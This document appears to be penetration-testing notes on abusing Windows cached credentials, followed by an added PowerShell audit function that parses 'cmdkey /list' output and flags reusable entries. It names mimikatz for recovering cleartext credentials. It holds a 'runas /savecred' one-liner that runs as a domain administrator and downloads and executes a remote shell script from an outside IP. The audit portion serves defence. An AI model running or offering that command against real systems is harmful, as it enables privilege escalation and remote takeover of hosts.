Cached Credentials

  • Use mimikatz to discover the cleartext version of cached credentials
Check for cached credentials
cmdkey /list
Run command under context of a cached credential
runas /user:<user> /savecred "<command>"
Example
cmdkey /list

Currently stored credentials:

Target: Domain:interactive=ACCESS\Administrator
Type: Domain Password
User: ACCESS\Administrator

runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.77/shell.ps1')"
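
To audit a host for the saved credentials checked for above, the `cmdkey /list` output can be parsed into objects and the entries that `runas /savecred` can reuse flagged for review. This is an added example, not part of the original notes; the function name ConvertFrom-CmdkeyList and the second sample entry are made up for illustration, and English-language cmdkey output is assumed.

```powershell
# Added example (not from the original notes): turn `cmdkey /list` text into
# objects so saved credentials can be reviewed or reported on.
function ConvertFrom-CmdkeyList {
    param([string[]]$Lines)   # not Mandatory: the output contains blank lines

    $entry = $null
    foreach ($line in $Lines) {
        if ($line -match '^\s*Target:\s*(.+?)\s*$') {
            # A Target line starts a new entry; emit the previous one first.
            if ($entry) { [pscustomobject]$entry }
            $target = $Matches[1]
            $entry = [ordered]@{
                Target = $target
                Type   = $null
                User   = $null
                # Entries of the form shown in the example above
                # (Domain:interactive=<user>) are the ones runas /savecred reuses.
                RunasSaveCred = ($target -match '^Domain:interactive=')
            }
        }
        elseif ($entry -and $line -match '^\s*(Type|User):\s*(.+?)\s*$') {
            $entry[$Matches[1]] = $Matches[2]
        }
    }
    if ($entry) { [pscustomobject]$entry }
}

# Constructed sample input; on a live host use: $raw = cmdkey /list
$raw = @(
    'Currently stored credentials:',
    '',
    '    Target: Domain:interactive=ACCESS\Administrator',
    '    Type: Domain Password',
    '    User: ACCESS\Administrator',
    '',
    '    Target: LegacyGeneric:target=example-app',   # hypothetical entry
    '    Type: Generic',
    '    User: svc-example'
)

# List only the entries that allow commands to run as another user
# without a password prompt.
ConvertFrom-CmdkeyList -Lines $raw |
    Where-Object RunasSaveCred |
    Format-Table Target, Type, User -AutoSize
```

Entries that are no longer needed can be removed with `cmdkey /delete:<target>`.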